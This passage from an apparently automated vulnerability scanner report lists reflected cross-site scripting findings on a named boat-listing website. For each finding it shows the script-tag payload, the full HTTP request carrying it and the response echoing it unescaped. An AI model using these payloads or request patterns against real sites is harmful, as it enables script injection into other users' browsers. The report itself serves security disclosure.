2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/VAa142d"><script>alert(1)</script>12c59d7a8be/United-States&boat_id=2305173">
...[SNIP]...

3.95. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a67c"><script>alert(1)</script>266250d89b2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States7a67c"><script>alert(1)</script>266250d89b2 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:55 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:55 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States7a67c"><script>alert(1)</script>266250d89b2&boat_id=2305173">
...[SNIP]...

3.96. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 138a0"><script>alert(1)</script>a5a2c4dcb2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States?138a0"><script>alert(1)</script>a5a2c4dcb2d=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:18 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:17 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&138a0"><script>alert(1)</script>a5a2c4dcb2d=1&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States&boat_id=2305173">
...[SNIP]...

3.97. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7c2f"><script>alert(1)</script>22176e24a46 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmingtone7c2f"><script>alert(1)</script>22176e24a46/NC/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:58 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
